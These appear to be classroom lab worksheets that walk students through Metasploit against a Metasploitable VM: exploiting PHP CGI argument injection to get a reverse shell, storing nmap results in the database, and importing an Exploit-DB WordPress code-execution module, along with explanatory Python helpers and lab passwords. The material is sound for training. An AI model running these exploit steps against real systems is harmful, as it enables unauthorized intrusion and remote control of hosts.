
All of these ports and the services/applications running on them have the potential to be exploited, but first we have to determine the version of the software running on them: exploits are written against specific versions, and the port number alone does not tell us which ones apply.

6. Take notice of TCP port 80. Apache httpd 2.2.8 (Ubuntu) is running. Let’s see if we can find out more information about the software running on port 80.

7. Type: use auxiliary/scanner/http/http_version

8. Type: info (Make note of the RHOSTS option. We’ll use that to specify the IP of our target.)

9. Type: set RHOSTS x.x.x.x (This is our target’s IP.)

10. Type: set RPORT 80

11. Type: run (For auxiliary modules such as scanners, run and exploit do the same thing.)

12. Take notice of the results: Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 ). The scanner is simply reporting the Server and X-Powered-By headers the web server sent back.

13. We just learned a little bit more about our Apache server running on Ubuntu: it’s running PHP 5.2.4. The -2ubuntu5.10 suffix is Ubuntu’s package revision, not part of the upstream PHP version, and it matters: distribution packages often carry backported security fixes, so a version match is a lead to confirm, not proof of a vulnerability.

14. Let’s find out what exploits exist for PHP. Maximize your VMware window and type: clear

15. Type and wait: search php type:exploit

16. Type: use exploit/multi/http/php_cgi_arg_injection

17. Type: info

a. What version of PHP does the description say is vulnerable to this exploit?

ANSWER:

18. Now that we believe we may have a working exploit, let’s view the payloads compatible with it and choose one. (Many exploit modules also support the check command, which tests whether the target appears vulnerable without launching the exploit.) Type: show payloads

19. We’ll go with a simple, reliable reverse shell, which makes the target connect back to us rather than us connecting to it. Type: set PAYLOAD generic/shell_reverse_tcp

20. Type: set RHOST x.x.x.x (IP of target. Newer versions of Metasploit use RHOSTS for exploits as well; show options tells you which name this module expects.)

21. Type: set LHOST x.x.x.x (Your Kali IP: the address the target’s shell will connect back to, so it must be reachable from the target.)

22. Type: set LPORT 1234

23. Type: show options (This will verify your changes. Make sure the options you have set are showing.)

24. Type: show advanced (Verify there is nothing else you want to change.)

25. Type: exploit

26. You may be asking yourself what, if anything, happened. If Metasploit reported that a command shell session was opened, you are now typing into a shell on the target; this payload gives you no prompt, so just type: ls

a. How many files and folders were displayed?

ANSWER:

27. Type: pwd

a. Document your present working directory.

ANSWER:

28. Type: whoami

a. Document the name of the account you are logged on with.

ANSWER:

29. Type: uname -a (That is a plain hyphen; the en dash some editors substitute will not work in a shell.)

30. Type: cat /etc/issue

Excellent! You’ve used the msfconsole to run a port scan and save the results of that scan to a database for later retrieval. You further investigated a port of interest by running an additional scanner against it and learned the application and version information. You then searched Metasploit’s module database for applicable exploits. Once you found an appropriate exploit you chose a payload, ran it, got a reverse shell, and verified it by executing some simple commands. Congratulations! This sequence (scan, enumerate versions, match exploits to versions, pick a payload, verify the session) is the basic workflow of exploiting a system, and following it deliberately will help you understand the nuances of each step.

31. Press Ctrl+C to abort the session. Type “y” when prompted.

32. Type: back

33. Type: exit
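The version-matching logic behind steps 7 through 17, as an added example in Python. This is not part of the lab and not Metasploit’s own code: it parses the same Server and X-Powered-By headers the http_version scanner reads, rebuilds the one-line banner the scanner prints, separates the upstream version from Ubuntu’s package revision, and matches the advertised products against version ranges supplied by the caller, which is what you do by hand when you read a module’s info output. The response headers are a constructed sample; the version range in the demo is a placeholder for illustration, not the answer to 17a.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the response header block Metasploitable 2's Apache
# sends for GET /. The http_version scanner prints the Server header and,
# in parentheses, the X-Powered-By header, which is the line seen in step 12.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 01 Jan 2015 00:00:00 GMT\r\n"
    "Server: Apache/2.2.8 (Ubuntu) DAV/2\r\n"
    "X-Powered-By: PHP/5.2.4-2ubuntu5.10\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body>It works!</body></html>"
)

Version = Tuple[int, ...]
# "Name/version" tokens as they appear in Server and X-Powered-By headers.
PRODUCT_RE = re.compile(r"([A-Za-z][A-Za-z0-9_-]*)/(\d[A-Za-z0-9.+~-]*)")


def parse_headers(raw: str) -> Dict[str, str]:
    """Split a raw HTTP response into a header dict; the body is ignored."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:  # [1:] skips the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip()] = value.strip()
    return headers


def banner(headers: Dict[str, str]) -> str:
    """Rebuild the one-line summary the http_version scanner reports."""
    server = headers.get("Server", "")
    powered = headers.get("X-Powered-By")
    return f"{server} ( Powered by {powered} )" if powered else server


def products(headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Every (product, version) pair the server advertises."""
    found: List[Tuple[str, str]] = []
    for name in ("Server", "X-Powered-By"):
        found.extend(PRODUCT_RE.findall(headers.get(name, "")))
    return found


def upstream_version(text: str) -> Version:
    """'5.2.4-2ubuntu5.10' -> (5, 2, 4).

    Everything after the first '-' is the distribution's package revision.
    It is dropped for comparison, but it is exactly the part that tells you
    the package may carry backported fixes the upstream number doesn't show.
    """
    parts: List[int] = []
    for piece in text.split("-", 1)[0].split("."):
        m = re.match(r"\d+", piece)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def in_range(version: Version, low: str, high: str) -> bool:
    """low <= version < high, compared component-wise as integers."""
    return upstream_version(low) <= version < upstream_version(high)


def affected(headers: Dict[str, str],
             rules: Dict[str, List[Tuple[str, str]]]) -> List[str]:
    """Match advertised products against [low, high) version ranges.

    rules maps a product name to the ranges a module's 'info' output lists
    as affected. A hit means "worth trying", not "confirmed vulnerable".
    """
    hits: List[str] = []
    for name, ver in products(headers):
        for low, high in rules.get(name, []):
            if in_range(upstream_version(ver), low, high):
                hits.append(f"{name}/{ver}: upstream version inside [{low}, {high})")
    return hits


if __name__ == "__main__":
    hdrs = parse_headers(SAMPLE_RESPONSE)
    print(banner(hdrs))
    # Hypothetical range for illustration only: copy the real one from the
    # description shown by 'info' for the module you intend to use.
    demo_rules = {"PHP": [("5.2.0", "5.2.5")]}
    for hit in affected(hdrs, demo_rules):
        print(hit)
```

The range comparison deliberately works on the upstream numbers only; the dropped package revision is the reason to follow a hit with the module’s check command or the exploit itself rather than reporting the version match as a finding.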

Metasploit Database Lab

Class:

Name:

Date:

1. If your VMs aren’t already running, open VMware and launch the Kali VM and login as root with your password wilmuabc. *If Metasploit is loaded from a previous lab it must be closed.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Type: service postgresql start

3a. Type: service metasploit start (The first start of the metasploit service creates the Metasploit database and its PostgreSQL user and writes the connection settings msfconsole reads when it launches.)

3b. Type: service metasploit stop (The service itself, the RPC daemon, isn’t needed by the console, so stop it again. On current Kali releases this whole setup is done with: msfdb init)

4. Launch Metasploit. Type: msfconsole

Once Metasploit launches it should connect to the Postgres database automatically; let’s verify.

5. Type: db_status (You should see a connection to the database.)

5a. Are we connected to a database?

ANSWER:

6. If Metasploitable isn’t already running open another instance of VMware and launch the Metasploitable VM.

7. At the user logon prompt type: msfadmin

8. At the password prompt type: msfadmin

9. Type: ifconfig

10. Record the IP address here:

Metasploit has a default relational database you can populate with data. The database is very useful for capturing and organizing penetration testing data that you may want to refer to again, use for automating penetration tests, share with others, create reports from, etc. Among its tables are: hosts, services, vulns, clients, loot (passwords, hashes, etc.), notes, and creds.

Useful database commands are:

db_connect (Connects you to an existing database.)

db_disconnect (Disconnects you from a database.)

db_driver (In older versions, lets you specify the type of database you will be connecting to: MySQL, SQLite, PostgreSQL. Current versions of the framework support PostgreSQL only and no longer have this command.)

db_status (Tells you whether you’re connected and to which database.)

db_export (Exports the contents of the database to XML.)

db_import (Imports scan output from other tools, for example nmap XML or .nessus files.)

1. We know we are connected to the database so now let’s populate it with target information. Switch back to your Kali VM and return to the Metasploit prompt msf>.

2. Type: db_nmap x.x.x.x (IP of your target. db_nmap passes its arguments straight to nmap, so db_nmap -sV x.x.x.x records service versions as well as open ports.)

3. You’ve just added the contents of your nmap scan to the database. Let’s view the individual tables.

4. Type: hosts

a. What hosts are listed in the table?

ANSWER:

5. Type: services

a. What information is provided in this table?

ANSWER:

6. We would normally also type “notes” or “loot” or “vulns” but we haven’t populated the database with any of that information yet. FYI, the vulns information may be imported from .nessus files with db_import. If you’re not familiar with Nessus, Google it for a quick reference. These tables will populate as you exploit systems.

Interacting with a database while performing reconnaissance or running a vulnerability scan may not seem immensely helpful in a lab setting, because we’re only scanning one system. But what if we were scanning 10 systems, or 100, or 1,000, or 10,000, or more? It is simply not feasible for a pen tester to scroll through the results and manually document interesting findings. That’s where logging our penetration testing results to a database really pays off: we can ask the database which hosts expose a given service instead of rereading every scan. Being able to instantly reference all of the hosts we’ve scanned for a project, or to review all of the possible vulnerabilities in the systems we’ll be exploiting, is a professional approach to handling the mountains of data a customer engagement can generate.
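What db_nmap and db_import do with a scan, as an added example in Python that is not part of the lab and not Metasploit’s own code. It parses nmap’s XML output (the format db_import accepts) into hosts and services tables in an in-memory SQLite database, skipping hosts nmap reported as down, and then answers the question that only a database answers well at scale: which hosts have a given port open. The nmap XML is a constructed sample (TEST-NET addresses; the first host’s services are modelled on Metasploitable 2) and the table layout is a simplified stand-in for Metasploit’s real schema.

```python
import sqlite3
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Constructed nmap -oX output, trimmed to the elements an importer needs.
# The first host mirrors what a service scan of Metasploitable 2 reports;
# the addresses are documentation-range (TEST-NET-1), not a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 192.0.2.0/29">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="metasploitable" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.2.8" extrainfo="(Ubuntu) DAV/2"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/>
        <service name="mysql" product="MySQL" version="5.0.51a-3ubuntu5"/></port>
    </ports>
    <os><osmatch name="Linux 2.6.X" accuracy="95"/></os>
  </host>
  <host>
    <status state="up"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.4"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/>
        <service name="http"/></port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.0.2.12" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Simplified stand-in for Metasploit's hosts and services tables.
SCHEMA = """
CREATE TABLE hosts (address TEXT PRIMARY KEY, name TEXT, os_name TEXT);
CREATE TABLE services (
    address TEXT REFERENCES hosts(address), port INTEGER, proto TEXT,
    state TEXT, name TEXT, info TEXT, PRIMARY KEY (address, port, proto));
"""


def service_info(svc: Optional[ET.Element]) -> Tuple[Optional[str], Optional[str]]:
    """(name, info) the way nmap's -sV fields read in the services table."""
    if svc is None:
        return None, None
    fields = (svc.get("product"), svc.get("version"), svc.get("extrainfo"))
    info = " ".join(v for v in fields if v)
    return svc.get("name"), info or None


def import_nmap_xml(xml_text: str, conn: sqlite3.Connection) -> int:
    """Store every host nmap saw as up; returns the number of hosts added.

    Down hosts are skipped: there is nothing to record for them and they
    would only pollute the hosts table.
    """
    root = ET.fromstring(xml_text)
    added = 0
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']").get("addr")
        hn = host.find("hostnames/hostname")
        osm = host.find("os/osmatch")
        conn.execute("INSERT OR REPLACE INTO hosts VALUES (?, ?, ?)",
                     (addr, hn.get("name") if hn is not None else None,
                      osm.get("name") if osm is not None else None))
        for port in host.iter("port"):
            name, info = service_info(port.find("service"))
            conn.execute("INSERT OR REPLACE INTO services VALUES (?, ?, ?, ?, ?, ?)",
                         (addr, int(port.get("portid")), port.get("protocol"),
                          port.find("state").get("state"), name, info))
        added += 1
    conn.commit()
    return added


def build_db(xml_text: str) -> sqlite3.Connection:
    """Fresh in-memory database populated from one nmap XML document."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    import_nmap_xml(xml_text, conn)
    return conn


def hosts(conn: sqlite3.Connection) -> List[Tuple]:
    """What the 'hosts' command shows."""
    return conn.execute("SELECT address, name, os_name FROM hosts ORDER BY address").fetchall()


def services(conn: sqlite3.Connection) -> List[Tuple]:
    """What the 'services' command shows."""
    return conn.execute("SELECT address, port, proto, state, name, info "
                        "FROM services ORDER BY address, port").fetchall()


def hosts_with_open_port(conn: sqlite3.Connection, port: int, proto: str = "tcp") -> List[str]:
    """The query that scales to thousands of hosts: who exposes this port?"""
    rows = conn.execute("SELECT address FROM services WHERE port=? AND proto=? "
                        "AND state='open' ORDER BY address", (port, proto))
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = build_db(SAMPLE_NMAP_XML)
    for row in hosts(db):
        print("host", row)
    for row in services(db):
        print("service", row)
    print("port 80 open on:", hosts_with_open_port(db, 80))
```

The same question in msfconsole is services -p 80 -u (open services on port 80), which is what makes the database worth the two extra commands on a one-host lab.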


Updating Metasploit Lab

Class:

Name:

Date:

1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Launch Metasploit by typing: msfconsole

There are many reasons to update Metasploit. Updating installs bug fixes and new community tools and, most importantly, adds exploit modules. There are two ways to do this.

Your first option is to update Metasploit in an automated fashion by typing “msfupdate” at the command line. On the Kali version these labs were written for this requires registration with Rapid7 for a community edition key. This updates Metasploit with the latest settings, Ruby version, modules, etc. You may also simply update Kali by going to “Applications-System Tools-Software Update”. (On current Kali releases the framework is an ordinary package and is updated with: apt update && apt install metasploit-framework)

The second way to update Metasploit is manually. Being able to do this is important because it allows you to import the latest exploits, regardless of where you find them, as long as they follow Rapid7’s development rules for Metasploit modules. It’s also important because the automated update tool will sometimes break your Metasploit install by modifying your Ruby version or making another change to your environment. This lab will focus on sharpening your skills as penetration testers by having you search for an exploit online, download it, install it, and test it.

There is a third way to update Metasploit: build your own module. You’ll have to know how to program in Ruby. You can learn more about Metasploit exploit development here: http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

1. Using your Kali VM, open the Iceweasel web browser by clicking on the icon to the right of the word “Places” and navigate to: http://www.exploit-db.com/

WordPress is a popular content management system used for blogging on the world wide web. It has been in the news recently for having multiple vulnerabilities.

2. Click on the “Search” button.

3. In the “Free Text Search” field type: WordPress

4. Click “Search”.

5. Look at the exploits and notice the information on the left of the screen. One of the most important things to notice is the check mark. The check mark indicates the exploit has been verified by the Exploit-DB team (Exploit-DB is run by Offensive Security, not Rapid7). It’s critical that you only import and use trusted exploits, and that you read the code before you run it. Otherwise, you could be importing a trojan horse, or worse, onto your system or your customer’s system.

6. Go to page 9 and click on “WordPress HMS Testimonials Plugin 2.0.10 – Multiple Vulnerabilities”. (Results are listed newest first, so the page number will have shifted since this was written; search for the title if you don’t see it.)

7. Who is the author of this exploit?

7a. Answer:

8. What date was this exploit published?

8a. Answer:

9. Now click the download icon next to these words “Exploit Code:”.

10. What type of file is this?

10a. Answer:

11. Open the file that you downloaded. As you can see, these are instructions for exploiting a WordPress vulnerability in the way user feedback (testimonials) may be posted. So how would you go about loading this into Metasploit? You wouldn’t. This is simply a text file that walks through manually exploiting WordPress, but I chose to show it to you because, as you can see, when you’re looking for the latest exploits you don’t always need a module: there are hands-on instructions for exploiting this vulnerability. If there isn’t a current exploit in Metasploit for your vulnerability be sure to check Exploit-db.com, not just for modules but also for hands-on exploit instructions.

Metasploit is written in the Ruby programming language, and its modules are Ruby source files (.rb) that follow the framework’s module structure. Any exploit we want to import has to be written as a Metasploit module; a standalone exploit in another language, or a text advisory like the one above, must be ported to Ruby first.

12. Close the text file and return to the web page. Go to page 9 and locate this exploit and click on it: WordPress W3 Total Cache PHP Code Execution (This entry is a Metasploit module, which is why it downloads as a .rb file.)

13. Click the download icon. When prompted to save the file name it: wordpress_w3_php_code_exec.rb Hit the drop-down arrow next to “Save in folder:” and select “Desktop”.

14. Click “Save”.

15. Minimize all of your windows. You should see a Ruby file on your desktop.

16. Switch your focus to your Metasploit instance and type: banner. How many exploits are listed?

16a. Answer:

17. Now it’s time to import your new Ruby file into the Metasploit framework. Open a shell by clicking on the black box next to the word “Places” at the top of your desktop screen. Type this, on one line, to copy in your new exploit: cp /root/Desktop/wordpress_w3_php_code_exec.rb /usr/share/metasploit-framework/modules/exploits/multi/php

The directory you copy the file into determines the module’s name: a file under modules/exploits/multi/php is used as exploit/multi/php/<filename without .rb>. Copying into /usr/share/metasploit-framework works, but a package update may overwrite it; Metasploit also loads modules from ~/.msf4/modules/ with the same directory layout, and modules placed there survive updates.

18. Switch back to your Metasploit shell and type: reload_all

19. How many exploits do you have now?

19a. Answer:

20. Type: use exploit/multi/php/wordpress_w3_php_code_exec

21. Type: info

What does this module do?

21a. Answer:

You now have a better understanding of when to download a single exploit versus updating your entire Metasploit install. You’ve looked for a recently published exploit, downloaded it, copied it to the appropriate location within Metasploit, reloaded the module tree, and verified its availability as a module.
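The two decisions behind steps 11 through 20, as an added example in Python that is not part of the lab and not Metasploit’s own code: tell a real module apart from a plain-text advisory by its class declaration, and derive the module’s use name from the directory it is installed into. The module and advisory texts are constructed stand-ins (the module header is not the real W3 Total Cache module), and the demo installs into a temporary directory that stands in for ~/.msf4/modules.

```python
import re
import shutil
import tempfile
from pathlib import Path
from typing import Dict, Optional

# The class line every Metasploit module has. Older modules, like those on
# Exploit-DB from this period, read "class Metasploit3 < Msf::Exploit::Remote";
# current ones read "class MetasploitModule < Msf::Auxiliary".
CLASS_RE = re.compile(
    r"^\s*class\s+Metasploit(?:Module|\d)\s*<\s*Msf::(Exploit|Auxiliary|Post)\b", re.M)

# module type -> (directory under modules/, prefix you type after 'use')
TYPE_INFO = {"Exploit": ("exploits", "exploit"),
             "Auxiliary": ("auxiliary", "auxiliary"),
             "Post": ("post", "post")}

# Constructed stand-in for a module downloaded from Exploit-DB. It is NOT
# the real W3 Total Cache module; only the header matters here.
SAMPLE_MODULE = """##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions.
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info, 'Name' => 'Constructed example module'))
  end
end
"""

# Constructed stand-in for a plain-text advisory like the HMS Testimonials
# entry in step 11: instructions for a human, not code Metasploit can load.
SAMPLE_ADVISORY = """# Exploit Title: Example Plugin 1.0 - Multiple Vulnerabilities
# Tested on: WordPress 3.x
1. Log in as a subscriber and submit a testimonial containing <script>...
"""


def module_type(source: str) -> Optional[str]:
    """'Exploit', 'Auxiliary' or 'Post', or None if this isn't a module."""
    m = CLASS_RE.search(source)
    return m.group(1) if m else None


def install_module(src: Path, subdir: str, root: Path) -> str:
    """Copy src under root/<type dir>/<subdir>/ and return its 'use' name.

    root is normally ~/.msf4/modules (survives package updates) or
    /usr/share/metasploit-framework/modules as in step 17. The directory
    layout IS the module name: exploits/multi/php/foo.rb -> exploit/multi/php/foo.
    Raises ValueError for anything that isn't a Ruby module.
    """
    if src.suffix != ".rb":
        raise ValueError(f"{src.name}: modules must be .rb files")
    mtype = module_type(src.read_text())
    if mtype is None:
        raise ValueError(f"{src.name}: no 'class Metasploit... < Msf::...' line; not a module")
    type_dir, prefix = TYPE_INFO[mtype]
    dest_dir = root / type_dir / subdir
    dest_dir.mkdir(parents=True, exist_ok=True)
    shutil.copy2(src, dest_dir / src.name)
    return f"{prefix}/{subdir}/{src.stem}"


def run_demo() -> Dict[str, object]:
    """Install the sample module into a temporary module root, then try the
    advisory the same way; returns what happened for inspection."""
    result: Dict[str, object] = {}
    with tempfile.TemporaryDirectory() as tmp:
        tmp_path = Path(tmp)
        root = tmp_path / "msf4" / "modules"  # stands in for ~/.msf4/modules
        mod = tmp_path / "wordpress_w3_php_code_exec.rb"
        mod.write_text(SAMPLE_MODULE)
        adv = tmp_path / "hms_testimonials.txt"
        adv.write_text(SAMPLE_ADVISORY)
        result["use_name"] = install_module(mod, "multi/php", root)
        installed = root / "exploits" / "multi" / "php" / mod.name
        result["installed_at"] = installed.relative_to(root).as_posix()
        result["module_present"] = installed.is_file()
        try:
            install_module(adv, "multi/php", root)
            result["advisory_rejected"] = False
        except ValueError as err:
            result["advisory_rejected"] = True
            result["reason"] = str(err)
    return result


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
    print("After copying, type reload_all in msfconsole, then use the name above.")
```

The suffix and class-line checks are deliberately strict: a file that passes them is still untrusted Ruby that msfconsole will execute with your privileges, so read it before reload_all, not after.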

Now let’s look at the professional version of Metasploit.

Type: go_pro

Follow the prompts to upgrade your Metasploit version from the framework edition to the professional version. (The go_pro command has been removed from current versions of the framework; Metasploit Pro is now installed separately from Rapid7.)

Metasploit Scanning Lab

Class:

Name:

Date:

1. If your VMs aren’t already running then open VMware and launch the Kali VM and login as root with your password wilmuabc.

2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word “Places”.

3. Type: msfconsole

4. Open another instance of VMware Player and launch the Metasploitable VM.

5. At the user logon prompt type: msfadmin

6. At the password prompt type: msfadmin

7. Type: ifconfig

8. Record the Metasploitable VM IP address here:
